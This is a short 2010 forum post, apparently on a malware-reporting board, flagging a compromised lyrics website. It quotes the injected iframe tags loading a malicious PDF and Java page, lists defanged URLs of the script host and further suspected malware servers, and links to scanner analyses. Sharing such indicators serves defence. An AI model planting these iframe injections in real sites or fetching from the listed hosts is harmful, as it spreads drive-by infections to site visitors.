Author Topic: malicius  (Read 3459 times)

0 Members and 1 Guest are viewing this topic.

April 20, 2010, 03:46:35 pm
Read 3459 times

bpz

  • Newbie

  • Offline
  • *

  • 4
hi all:

hxxp://www.angolotesti.it/J/testi_canzoni_jovanotti_168/testo_canzone_chissa_se_stai_dormendo_9566.html

embedded malicious script:

hxxp://rian-ru.sitepoint.com.dion-ne-jp.greatloveguide.at:8080/careerbuilder.com/careerbuilder.com/multiply.com/google.com/adsrevenue.net.php

malicios iframe:
<iframe src=pics/ChangeLog.pdf></iframe>
<iframe src=pics/java.html></iframe>



analisis of changelog.pdf:

http://www.virustotal.com/it/analisis/c3bd5c85f6758f1f84ed0500c3c19995f252a8f56c2236cdef80e0ce5c1c37b2-1271777895

http://wepawet.iseclab.org/view.php?hash=f4e5652299643cc82d19149b582ddb68&type=js



Additional (potential) malware:
URL   Type   Hash   Analysis
hxxp://theyellowsun.info:8080/main.php?id=6&h=312